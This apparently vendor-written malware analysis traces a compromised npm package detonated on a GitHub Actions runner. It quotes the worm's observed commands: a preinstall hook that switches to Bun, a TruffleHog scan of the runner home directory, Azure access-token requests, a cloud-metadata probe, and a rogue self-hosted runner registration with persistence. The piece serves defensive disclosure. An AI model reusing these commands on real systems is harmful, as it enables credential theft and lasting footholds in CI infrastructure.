npm install against a compromised package ran for over an hour on a GitHub Actions runner. In the runtime record, the lineage pivoted from Node to Bun, scanned /home/runner with TruffleHog, probed cloud metadata, and attempted rogue runner registration. One install generated the full chain, and the kernel trace preserves it end to end.The campaign, dubbed "The Second Coming", executes during install-time lifecycle hooks — before the dependency graph is fully settled. The dropper installs the Bun runtime to escape Node-centric tooling, then runs a large obfuscated payload that harvests npm tokens, GitHub PATs, and cloud credentials. Unit 42 noted the scripts were likely LLM-assisted; Microsoft published Defender guidance for detection and investigation.
That is the artifact-and-victim story — reconstructed from logs and post-mortems after the damage was done. What follows is the runtime tape: what the worm actually does on a runner, second by second, under kernel-level observation.
What Garnet observed
Method: controlled detonation of @seung-ju/react-native-action-sheet@0.2.1 in garnet-labs/product-testing ("Install from npmjs" workflow) on a GitHub Actions runner instrumented with Garnet's eBPF sensor (run_id: 19750364519). The summarized profile shows 14 outbound destinations with 2 flagged egress leaves (169.254.169.254 and api.tomorrow.io).
Execution lineage
Run 19750364519 · garnet-labs/product-testing
Install from npmjs
The lineage above shows the full ancestry from npm install to every technique the worm uses. The preinstall hook fires sh -c "node setup_bun.js", which downloads the Bun runtime (bun.sh), stages it under ~/.dev-env/, and hands execution to bun bun_environment.js. From that point, most Node-only instrumentation goes blind — the heavy work no longer runs inside the Node/V8 process tree. Kernel-level ancestry does not care which interpreter won; it still sees every child process and socket. Garnet fires interpreter_shell_spawn on the pivot.
Credential harvesting and validation
Under Bun, the worm downloads TruffleHog (~/.truffler-cache/trufflehog_3.91.1_linux_amd64) and runs it against the entire runner home directory:
trufflehog filesystem /home/runner --jsonTruffleHog does not merely find secrets — it validates them against live APIs. The execution lineage shows egress from this process to keychecker.trufflesecurity.com (TruffleHog's own verification backend), api.cloudflare.com, api.aiven.io, api.box.com, github.com, and gitlab.com (both SSH on port 22 and HTTPS on 443). Each destination is a credential verification attempt for a different service. Telemetry showed periodic re-scanning on a rough beat (on the order of tens of minutes), consistent with waiting for late-arriving tokens mid-workflow rather than a one-shot harvest.
Cloud credential theft
In parallel with the secret scan, the worm targets cloud identity. The lineage shows two paths into Azure credentials — CLI and PowerShell:
az account get-access-token --output json --resource https://vault.azure.netpwsh -Command "Import-Module Az.Accounts"The Azure CLI command requests a Managed Identity token scoped for Key Vault — if the runner has one, the attacker does not need to find secrets on disk; Azure hands them over directly. An outbound probe to 169.254.169.254:80 (visible as a leaf destination in the lineage) is the classic instance metadata grab for temporary cloud credentials. These commands are dual-use in real CI; ancestry (child of npm install / Bun dropper) and clustering are what make them suspicious here.
Infrastructure capture
The worm does not stop at secrets — it wants compute. Visible in the lineage as the config.sh branch, the worm downloads the official GitHub Actions runner binary (from objects.githubusercontent.com), registers it unattended against an attacker-controlled repository, and backgrounds the listener:
RUNNER_ALLOW_RUNASROOT=1 ./config.sh \
--url https://github.com/Cpreet/lr8su68xsi5ew60p6k \
--unattended \
--token AJLWEOHS55OZFARDGWZFUZDJFD3XW \
--name "SHA1HULUD"
nohup ./run.sh &The execution lineage shows a rogue Runner.Listener process spawning under config.sh, connecting to github.com to complete registration. Garnet fires hidden_elf_exec — execution from the hidden ~/.dev-env/ directory. A successful registration yields a programmable node inside the victim's perimeter that persists after the workflow step completes. The nohup ./run.sh branch in the lineage — orphaned from the original install process — is the persistence mechanism.
Egress
Of the roughly 200 flows in the run, most map to TruffleHog validation endpoints or standard CI infrastructure. One destination — api.tomorrow.io:443 (104.18.28.42), a Cloudflare-fronted weather API — had no legitimate role in the job. The lineage shows an outbound flow to api.tomorrow.io from a process inside the payload tree — a destination this job had no reason to reach.
npm install downstream of a lifecycle hook ended up registering infrastructure.CI is one place this untrusted-execution problem becomes obvious because install-time hooks run with immediate access to secrets and network. The same visibility gap shows up anywhere teams execute code they did not author — from AI agent sandboxes to transitive runtime dependencies. Here, the kernel-level lineage is what turns a noisy chain into attributable behavior.
Real-world impact
Even after malicious versions are pulled from npm, self-hosted runner registration means attackers can retain a foothold independent of the poisoned package. The campaign's scale — 487 organizations and 14,206 exposed secrets in 72 hours per Check Point — reflects how quickly install-time execution scales across automation. Months later, the same structural gap — code executing inside CI with full secrets access and no kernel-level audit trail — recurred across Trivy, KICS, LiteLLM, Telnyx, and axios.
Explore the execution lineage yourself in the profile above, or start observing your own workflows with Garnet.